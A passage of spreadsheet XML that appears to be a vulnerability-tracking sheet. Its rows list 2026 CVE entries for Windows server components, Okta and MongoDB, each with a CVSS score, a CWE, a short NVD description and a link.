        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78523</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K266" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr"/>
      <c r="Q266" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78574</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr"/>
      <c r="Q267" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="R267"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S267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83989</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K26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8" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr"/>
      <c r="Q268" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84001</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K26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69" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr"/>
      <c r="Q269" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78627</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr"/>
      <c r="Q270" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R270"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S270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr"/>
      <c r="Q271" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue exists in the server's query execution memory tracking subsystem. An authenticated user with read privileges can trigger a write to freed heap memory through a sequence of standard database commands, leading to server process crash or potential memory corruption. No user interaction is required.</t>
        </is>
      </c>
